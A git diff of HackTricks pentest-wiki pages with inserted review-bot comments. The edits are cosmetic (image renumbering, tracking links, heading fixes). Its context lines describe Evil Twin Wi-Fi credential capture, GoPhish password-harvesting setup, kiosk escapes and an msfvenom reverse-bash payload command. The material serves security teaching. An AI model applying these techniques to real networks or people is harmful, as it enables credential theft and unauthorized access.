@@ -634,7 +634,7 @@ You could also create an Evil Twin using **eaphammer** (notice that to create ev
Or using Airgeddon: `Options: 5,6,7,8,9 (inside Evil Twin attack menu).`
-![](<../../.gitbook/assets/image (1085).png>)
+![](<../../.gitbook/assets/image (1088).png>)
Please, notice that by default if an ESSID in the PNL is saved as WPA protected, the device won't connect automatically to an Open evil Twin. You can try to DoS the real AP and hope that the user will connect manually to your Open evil twin, or you could DoS the real AP an use a WPA Evil Twin to capture the handshake (using this method you won't be able to let the victim connect to you as you don't know the PSK, but you can capture the handshake and try to crack it).
@@ -698,7 +698,7 @@ Or you could also use:
`Airgeddon` can use previously generated certificated to offer EAP authentication to WPA/WPA2-Enterprise networks. The fake network will downgrade the connection protocol to EAP-MD5 so it will be able to **capture the user and the MD5 of the password**. Later, the attacker can try to crack the password.\
`Airggedon` offers you the possibility of a **continuous Evil Twin attack (noisy)** or **only create the Evil Attack until someone connects (smooth).**
-![](<../../.gitbook/assets/image (933).png>)
+![](<../../.gitbook/assets/image (936).png>)
### Debugging PEAP and EAP-TTLS TLS tunnels in Evil Twins attacks
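Review bot: The second unchanged line of this hunk spells the tool `Airggedon`, while the line above it and the rest of the page use `Airgeddon`. The first line also reads "previously generated certificated", where "certificates" is meant. Both sit directly above the screenshot being renumbered and can be fixed in the same pass.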
@@ -713,11 +713,11 @@ Now or later (when you have already captured some authentication intents) you ca
Add a new entry and fill the form with this values: **IP address = any** -- **Port = 0** -- **Protocol = data** -- **Key File** (**select your key file**, to avoid problems select a key file **without being password protected**).
-![](<../../.gitbook/assets/image (684).png>)
+![](<../../.gitbook/assets/image (687).png>)
And look at the new **"Decrypted TLS" tab**:
-![](<../../.gitbook/assets/image (228).png>)
+![](<../../.gitbook/assets/image (231).png>)
## KARMA, MANA, Loud MANA and Known beacons attack
@@ -830,7 +830,7 @@ These methods, particularly PIN entry, are susceptible to the same vulnerabiliti
TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) (login con facebook e imitacionde WPA en captive portals)
-
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
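Review bot: The unchanged line at the top of this hunk is a leftover `TODO:` that ships in the published page, and its parenthetical "(login con facebook e imitacionde WPA en captive portals)" is in Spanish with two words run together. Either resolve the TODO into a short wifiphisher section or translate and tidy the note, so the page does not end on an internal reminder right above the banner being edited.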
diff --git a/generic-methodologies-and-resources/phishing-methodology/README.md b/generic-methodologies-and-resources/phishing-methodology/README.md
index 7a4b5453f..d48d41f89 100644
--- a/generic-methodologies-and-resources/phishing-methodology/README.md
+++ b/generic-methodologies-and-resources/phishing-methodology/README.md
@@ -261,7 +261,7 @@ You must **configure a SPF record for the new domain**. If you don't know what i
You can use [https://www.spfwizard.net/](https://www.spfwizard.net) to generate your SPF policy (use the IP of the VPS machine)
-![](<../../.gitbook/assets/image (1034).png>)
+![](<../../.gitbook/assets/image (1037).png>)
This is the content that must be set inside a TXT record inside the domain:
@@ -379,7 +379,7 @@ Note that **in order to increase the credibility of the email**, it's recommende
* Search for **public emails** like info@ex.com or press@ex.com or public@ex.com and send them an email and wait for the response.
* Try to contact **some valid discovered** email and wait for the response
-![](<../../.gitbook/assets/image (77).png>)
+![](<../../.gitbook/assets/image (80).png>)
{% hint style="info" %}
The Email Template also allows to **attach files to send**. If you would also like to steal NTLM challenges using some specially crafted files/documents [read this page](../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md).
@@ -392,7 +392,7 @@ The Email Template also allows to **attach files to send**. If you would also li
* Mark **Capture Submitted Data** and **Capture Passwords**
* Set a **redirection**
-![](<../../.gitbook/assets/image (823).png>)
+![](<../../.gitbook/assets/image (826).png>)
{% hint style="info" %}
Usually you will need to modify the HTML code of the page and make some tests in local (maybe using some Apache server) **until you like the results.** Then, write that HTML code in the box.\
@@ -408,7 +408,7 @@ For the redirection you could **redirect the users to the legit main web page**
* Set a name
* **Import the data** (note that in order to use the template for the example you need the firstname, last name and email address of each user)
-![](<../../.gitbook/assets/image (160).png>)
+![](<../../.gitbook/assets/image (163).png>)
### Campaign
@@ -416,7 +416,7 @@ Finally, create a campaign selecting a name, the email template, the landing pag
Note that the **Sending Profile allow to send a test email to see how will the final phishing email looks like**:
-![](<../../.gitbook/assets/image (189).png>)
+![](<../../.gitbook/assets/image (192).png>)
{% hint style="info" %}
I would recommend to **send the test emails to 10min mails addresses** in order to avoid getting blacklisted making tests.
diff --git a/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md b/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md
index 18a3aa6da..a8b32465c 100644
--- a/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md
+++ b/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
{% embed url="https://websec.nl/" %}
@@ -45,7 +45,7 @@ goclone
#https://github.com/trustedsec/social-engineer-toolkit
```
-
+
{% embed url="https://websec.nl/" %}
diff --git a/generic-methodologies-and-resources/phishing-methodology/detecting-phising.md b/generic-methodologies-and-resources/phishing-methodology/detecting-phising.md
index 61d8df6b9..f401fa6a7 100644
--- a/generic-methodologies-and-resources/phishing-methodology/detecting-phising.md
+++ b/generic-methodologies-and-resources/phishing-methodology/detecting-phising.md
@@ -64,11 +64,11 @@ It's not possible to take the previous "Brute-Force" approach but it's actually
The post [https://0xpatrik.com/phishing-domains/](https://0xpatrik.com/phishing-domains/) suggests that you can use Censys to search for certificates affecting a specific keyword and filter by date (only "new" certificates) and by the CA issuer "Let's Encrypt":
-![https://0xpatrik.com/content/images/2018/07/cert\_listing.png](<../../.gitbook/assets/image (1112).png>)
+![https://0xpatrik.com/content/images/2018/07/cert\_listing.png](<../../.gitbook/assets/image (1115).png>)
However, you can do "the same" using the free web [**crt.sh**](https://crt.sh). You can **search for the keyword** and the **filter** the results **by date and CA** if you wish.
-![](<../../.gitbook/assets/image (516).png>)
+![](<../../.gitbook/assets/image (519).png>)
Using this last option you can even use the field Matching Identities to see if any identity from the real domain matches any of the suspicious domains (note that a suspicious domain can be a false positive).
diff --git a/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md b/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md
index 5972da546..c09e123bf 100644
--- a/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md
+++ b/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md
@@ -33,7 +33,7 @@ DOCX files referencing a remote template (File –Options –Add-ins –Manage:
Go to: _Insert --> Quick Parts --> Field_\
_**Categories**: Links and References, **Filed names**: includePicture, and **Filename or URL**:_ http://\/whatever
-![](<../../.gitbook/assets/image (152).png>)
+![](<../../.gitbook/assets/image (155).png>)
### Macros Backdoor
diff --git a/generic-methodologies-and-resources/python/README.md b/generic-methodologies-and-resources/python/README.md
index 7fc9bdb55..13b60a659 100644
--- a/generic-methodologies-and-resources/python/README.md
+++ b/generic-methodologies-and-resources/python/README.md
@@ -14,13 +14,13 @@ Other ways to support HackTricks:
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=python) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=python" %}
**Interesting pages to check:**
@@ -30,13 +30,13 @@ Get Access Today:
* [**Basic python web requests syntax**](web-requests.md)
* [**Basic python syntax and libraries**](basic-python.md)
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=python) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=python" %}
diff --git a/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md b/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md
index 8ab10c698..654d1a450 100644
--- a/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md
+++ b/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md
@@ -69,7 +69,7 @@ Remember that the _**open**_ and _**read**_ functions can be useful to **read fi
Python try to **load libraries from the current directory first** (the following command will print where is python loading modules from): `python3 -c 'import sys; print(sys.path)'`
-![](<../../../.gitbook/assets/image (556).png>)
+![](<../../../.gitbook/assets/image (559).png>)
## Bypass pickle sandbox with the default installed python packages
diff --git a/generic-methodologies-and-resources/python/venv.md b/generic-methodologies-and-resources/python/venv.md
index c93d9b545..12c083fb1 100644
--- a/generic-methodologies-and-resources/python/venv.md
+++ b/generic-methodologies-and-resources/python/venv.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
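Review bot: The Trickest link left as context in this hunk still carries the old `utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks` query string, including the `hacktrics` misspelling, while python/README.md in this same commit moves to the `utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=python` form. If the tracking parameters are being migrated, update venv.md here as well (web-requests.md has the same context line) so the pages do not diverge.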
@@ -41,7 +41,7 @@ pip3 install wheel
inside the virtual environment
```
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/generic-methodologies-and-resources/python/web-requests.md b/generic-methodologies-and-resources/python/web-requests.md
index 793e9c983..f66673339 100644
--- a/generic-methodologies-and-resources/python/web-requests.md
+++ b/generic-methodologies-and-resources/python/web-requests.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -121,7 +121,7 @@ term = Terminal()
term.cmdloop()
```
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/generic-methodologies-and-resources/search-exploits.md b/generic-methodologies-and-resources/search-exploits.md
index 6ac03ed95..276b10dea 100644
--- a/generic-methodologies-and-resources/search-exploits.md
+++ b/generic-methodologies-and-resources/search-exploits.md
@@ -14,13 +14,13 @@ Other ways to support HackTricks:
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=search-exploits) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=search-exploits" %}
### Browser
@@ -64,13 +64,13 @@ You can also search in vulners database: [https://vulners.com/](https://vulners.
This searches for exploits in other databases: [https://sploitus.com/](https://sploitus.com)
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=search-exploits) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=search-exploits" %}
diff --git a/generic-methodologies-and-resources/shells/msfvenom.md b/generic-methodologies-and-resources/shells/msfvenom.md
index 192b1e7c2..55c7379ff 100644
--- a/generic-methodologies-and-resources/shells/msfvenom.md
+++ b/generic-methodologies-and-resources/shells/msfvenom.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@@ -234,7 +234,7 @@ msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f
```
{% endcode %}
-
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
diff --git a/generic-methodologies-and-resources/threat-modeling.md b/generic-methodologies-and-resources/threat-modeling.md
index b42b27a5e..09c18d5ff 100644
--- a/generic-methodologies-and-resources/threat-modeling.md
+++ b/generic-methodologies-and-resources/threat-modeling.md
@@ -2,7 +2,7 @@
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
@@ -12,7 +12,7 @@ You can check their website and try their engine for **free** at:
{% embed url="https://whiteintel.io" %}
----
+***
## Threat Modeling
@@ -124,10 +124,9 @@ Now your finished model should look something like this. And this is how you mak
This is a free tool from Microsoft that helps in finding threats in the design phase of software projects. It uses the STRIDE methodology and is particularly suitable for those developing on Microsoft's stack.
-
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
@@ -135,4 +134,4 @@ Their primary goal of WhiteIntel is to combat account takeovers and ransomware a
You can check their website and try their engine for **free** at:
-{% embed url="https://whiteintel.io" %}
\ No newline at end of file
+{% embed url="https://whiteintel.io" %}
diff --git a/hardware-physical-access/escaping-from-gui-applications.md b/hardware-physical-access/escaping-from-gui-applications.md
index 22b630dd2..db69ee3ea 100644
--- a/hardware-physical-access/escaping-from-gui-applications.md
+++ b/hardware-physical-access/escaping-from-gui-applications.md
@@ -1,4 +1,4 @@
-
+# Escaping from KIOSKs
@@ -9,14 +9,14 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-### [WhiteIntel](https://whiteintel.io)
+#### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
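Review bot: The follow-us bullet rewritten in this hunk still labels the link `@carlospolopm` while its target is the `hacktricks_live` Twitter account; since the line is being touched anyway, make the label match the target, as the PAM page in this same commit does with `@hacktricks_live`. The backslash added before the underscore is not needed there, because the underscore sits in the link destination and not in rendered text.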
@@ -28,7 +28,7 @@ You can check their website and try their engine for **free** at:
---
-# Check physical device
+## Check physical device
| Component | Action |
| ------------- | -------------------------------------------------------------------- |
@@ -37,7 +37,8 @@ You can check their website and try their engine for **free** at:
| USB ports | Connect physical keyboard with more shortcuts |
| Ethernet | Network scan or sniffing may enable further exploitation |
-# Check for possible actions inside the GUI application
+
+## Check for possible actions inside the GUI application
**Common Dialogs** are those options of **saving a file**, **opening a file**, selecting a font, a color... Most of them will **offer a full Explorer functionality**. This means that you will be able to access Explorer functionalities if you can access these options:
@@ -55,26 +56,26 @@ You should check if you can:
* Get access to restricted areas
* Execute other apps
-## Command Execution
+### Command Execution
-Maybe **using a `Open with`** option** you can open/execute some kind of shell.
+Maybe **using a `Open with`** option\*\* you can open/execute some kind of shell.
-### Windows
+#### Windows
For example _cmd.exe, command.com, Powershell/Powershell ISE, mmc.exe, at.exe, taskschd.msc..._ find more binaries that can be used to execute commands (and perform unexpected actions) here: [https://lolbas-project.github.io/](https://lolbas-project.github.io)
-### \*NIX __
+#### \*NIX \_\_
_bash, sh, zsh..._ More here: [https://gtfobins.github.io/](https://gtfobins.github.io)
-# Windows
+## Windows
-## Bypassing path restrictions
+### Bypassing path restrictions
* **Environment variables**: There are a lot of environment variables that are pointing to some path
* **Other protocols**: _about:, data:, ftp:, file:, mailto:, news:, res:, telnet:, view-source:_
* **Symbolic links**
-* **Shortcuts**: CTRL+N (open new session), CTRL+R (Execute Commands), CTRL+SHIFT+ESC (Task Manager), Windows+E (open explorer), CTRL-B, CTRL-I (Favourites), CTRL-H (History), CTRL-L, CTRL-O (File/Open Dialog), CTRL-P (Print Dialog), CTRL-S (Save As)
+* **Shortcuts**: CTRL+N (open new session), CTRL+R (Execute Commands), CTRL+SHIFT+ESC (Task Manager), Windows+E (open explorer), CTRL-B, CTRL-I (Favourites), CTRL-H (History), CTRL-L, CTRL-O (File/Open Dialog), CTRL-P (Print Dialog), CTRL-S (Save As)
* Hidden Administrative menu: CTRL-ALT-F8, CTRL-ESC-F9
* **Shell URIs**: _shell:Administrative Tools, shell:DocumentsLibrary, shell:Librariesshell:UserProfiles, shell:Personal, shell:SearchHomeFolder, shell:Systemshell:NetworkPlacesFolder, shell:SendTo, shell:UsersProfiles, shell:Common Administrative Tools, shell:MyComputerFolder, shell:InternetFolder_
* **UNC paths**: Paths to connect to shared folders. You should try to connect to the C$ of the local machine ("\\\127.0.0.1\c$\Windows\System32")
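Review bot: In the `Open with` sentence under Command Execution, the new line turns the stray closing `**` into `\*\*`, so the page will now show two literal asterisks after "option"; the unmatched marker should be deleted, not escaped. The same applies to the `#### \*NIX \_\_` heading, where the escaped underscores will render as a visible `__`; drop them so the heading reads `#### \*NIX`.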
@@ -92,13 +93,13 @@ _bash, sh, zsh..._ More here: [https://gtfobins.github.io/](https://gtfobins.git
| %TMP% | %USERDOMAIN% | %USERNAME% |
| %USERPROFILE% | %WINDIR% | |
-## Download Your Binaries
+### Download Your Binaries
Console: [https://sourceforge.net/projects/console/](https://sourceforge.net/projects/console/)\
Explorer: [https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2B/](https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2B/)\
Registry editor: [https://sourceforge.net/projects/uberregedit/](https://sourceforge.net/projects/uberregedit/)
-## Accessing filesystem from the browser
+### Accessing filesystem from the browser
| PATH | PATH | PATH | PATH |
| ------------------- | ----------------- | ------------------ | ------------------- |
@@ -110,7 +111,7 @@ Registry editor: [https://sourceforge.net/projects/uberregedit/](https://sourcef
| %TEMP% | %SYSTEMDRIVE% | %SYSTEMROOT% | %APPDATA% |
| %HOMEDRIVE% | %HOMESHARE | |
|
-## ShortCuts
+### ShortCuts
* Sticky Keys – Press SHIFT 5 times
* Mouse Keys – SHIFT+ALT+NUMLOCK
@@ -135,20 +136,20 @@ Registry editor: [https://sourceforge.net/projects/uberregedit/](https://sourcef
* CTRL+O – Open File
* CTRL+S – Save CTRL+N – New RDP / Citrix
-## Swipes
+### Swipes
* Swipe from the left side to the right to see all open Windows, minimizing the KIOSK app and accessing the whole OS directly;
* Swipe from the right side to the left to open Action Center, minimizing the KIOSK app and accessing the whole OS directly;
* Swipe in from the top edge to make the title bar visible for an app opened in full screen mode;
-* Swipe up from the bottom to show the taskbar in a full screen app.
+* Swipe up from the bottom to show the taskbar in a full screen app.
-## Internet Explorer Tricks
+### Internet Explorer Tricks
-### 'Image Toolbar'
+#### 'Image Toolbar'
It's a toolbar that appears on the top-left of image when it's clicked. You will be able to Save, Print, Mailto, Open "My Pictures" in Explorer. The Kiosk needs to be using Internet Explorer.
-### Shell Protocol
+#### Shell Protocol
Type this URLs to obtain an Explorer view:
@@ -174,47 +175,37 @@ Type this URLs to obtain an Explorer view:
* `shell:::{{208D2C60-3AEA-1069-A2D7-08002B30309D}}` --> My Network Places
* `shell:::{871C5380-42A0-1069-A2EA-08002B30309D}` --> Internet Explorer
-## Show File Extensions
+### Show File Extensions
Check this page for more information: [https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml](https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml)
-# Browsers tricks
+## Browsers tricks
Backup iKat versions:
[http://swin.es/k/](http://swin.es/k/)\
-[http://www.ikat.kronicd.net/](http://www.ikat.kronicd.net)\
+[http://www.ikat.kronicd.net/](http://www.ikat.kronicd.net)\\
-Create a common dialog using JavaScript and access file explorer: `document.write('')`
-Source: https://medium.com/@Rend_/give-me-a-browser-ill-give-you-a-shell-de19811defa0
+Create a common dialog using JavaScript and access file explorer: `document.write('')`\
+Source: https://medium.com/@Rend\_/give-me-a-browser-ill-give-you-a-shell-de19811defa0
-# iPad
+## iPad
-## Gestures and bottoms
+### Gestures and bottoms
* Swipe up with four (or five) fingers / Double-tap Home button: To view the multitask view and change App
-
* Swipe one way or another with four or five fingers: In order to change to the next/last App
-
* Pinch the screen with five fingers / Touch Home button / Swipe up with 1 finger from the bottom of the screen in a quick motion to the up: To access Home
-
* Swipe one finger from the bottom of the screen just 1-2 inches (slow): The dock will appear
-
* Swipe down from the top of the display with 1 finger: To view your notifications
-
* Swipe down with 1 finger the top-right corner of the screen: To see iPad Pro's control centre
-
* Swipe 1 finger from the left of the screen 1-2 inches: To see Today view
-
* Swipe fast 1 finger from the centre of the screen to the right or left: To change to next/last App
-
* Press and hold the On/**Off**/Sleep button at the upper-right corner of the **iPad +** Move the Slide to **power off** slider all the way to the right: To power off
+* Press the On/**Off**/Sleep button at the upper-right corner of the **iPad and the Home button for a few second**: To force a hard power off
+* Press the On/**Off**/Sleep button at the upper-right corner of the **iPad and the Home button quickly**: To take a screenshot that will pop up in the lower left of the display. Press both buttons at the same time very briefly as if you hold them a few seconds a hard power off will be performed.
-* Press the On/**Off**/Sleep button at the upper-right corner of the **iPad and the Home button for a few second**: To force a hard power off
-
-* Press the On/**Off**/Sleep button at the upper-right corner of the **iPad and the Home button quickly**: To take a screenshot that will pop up in the lower left of the display. Press both buttons at the same time very briefly as if you hold them a few seconds a hard power off will be performed.
-
-## Shortcuts
+### Shortcuts
You should have an iPad keyboard or a USB keyboard adaptor. Only shortcuts that could help escaping from the application will be shown here.
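Review bot: The iKat backup link line now ends in `\\`, which is an escaped backslash and renders as a literal `\` where the single trailing `\` produced a hard line break; keep one backslash. The renamed heading `### Gestures and bottoms` is also the place to fix the "bottoms" typo (buttons) while the line is being changed.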
@@ -231,7 +222,7 @@ You should have an iPad keyboard or a USB keyboard adaptor. Only shortcuts that
| ↑ | Up Arrow |
| ↓ | Down Arrow |
-### System shortcuts
+#### System shortcuts
These shortcuts are for the visual settings and sound settings, depending on the use of the iPad.
@@ -247,7 +238,7 @@ These shortcuts are for the visual settings and sound settings, depending on the
| F12 | Increase volume |
| ⌘ Space | Display a list of available languages; to choose one, tap the space bar again. |
-### iPad navigation
+#### iPad navigation
| Shortcut | Action |
| -------------------------------------------------- | ------------------------------------------------------- |
@@ -275,7 +266,7 @@ These shortcuts are for the visual settings and sound settings, depending on the
| ⌘⇥ (Command-Tab) | Switch back to the original app |
| ←+→, then Option + ← or Option+→ | Navigate through Dock |
-### Safari shortcuts
+#### Safari shortcuts
| Shortcut | Action |
| ----------------------- | ------------------------------------------------ |
@@ -292,7 +283,7 @@ These shortcuts are for the visual settings and sound settings, depending on the
| ⌘] | Goes forward one page in your browsing history |
| ⌘⇧R | Activate Reader Mode |
-### Mail shortcuts
+#### Mail shortcuts
| Shortcut | Action |
| -------------------------- | ---------------------------- |
@@ -303,17 +294,16 @@ These shortcuts are for the visual settings and sound settings, depending on the
| ⌘. | Stop loading the current tab |
| ⌘⌥F (Command-Option/Alt-F) | Search in your mailbox |
-# References
+## References
* [https://www.macworld.com/article/2975857/6-only-for-ipad-gestures-you-need-to-know.html](https://www.macworld.com/article/2975857/6-only-for-ipad-gestures-you-need-to-know.html)
* [https://www.tomsguide.com/us/ipad-shortcuts,news-18205.html](https://www.tomsguide.com/us/ipad-shortcuts,news-18205.html)
* [https://thesweetsetup.com/best-ipad-keyboard-shortcuts/](https://thesweetsetup.com/best-ipad-keyboard-shortcuts/)
* [http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html](http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html)
+#### [WhiteIntel](https://whiteintel.io)
-### [WhiteIntel](https://whiteintel.io)
-
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
@@ -332,9 +322,7 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
diff --git a/linux-hardening/bypass-bash-restrictions/README.md b/linux-hardening/bypass-bash-restrictions/README.md
index c5fccd0ad..92515ff7b 100644
--- a/linux-hardening/bypass-bash-restrictions/README.md
+++ b/linux-hardening/bypass-bash-restrictions/README.md
@@ -14,13 +14,13 @@ Other ways to support HackTricks:
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=bypass-bash-restrictions) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=bypass-bash-restrictions" %}
## Common Limitations Bypasses
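Review bot: The new text link adds `utm_term=trickest`, but the `{% embed %}` URL added a few lines later omits it, and the equivalent links added to python/README.md and search-exploits.md in this commit have no `utm_term` at all. Pick one parameter set and apply it to both the link and the embed so the campaign data stays comparable across pages.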
@@ -368,13 +368,13 @@ If you are inside a filesystem with the **read-only and noexec protections** or
* [https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0](https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0)
* [https://www.secjuice.com/web-application-firewall-waf-evasion/](https://www.secjuice.com/web-application-firewall-waf-evasion/)
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=bypass-bash-restrictions) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=bypass-bash-restrictions" %}
diff --git a/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md b/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md
index e45cb8c1c..925db79a2 100644
--- a/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md
+++ b/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -133,7 +133,7 @@ However, in this kind of containers these protections will usually exist, but yo
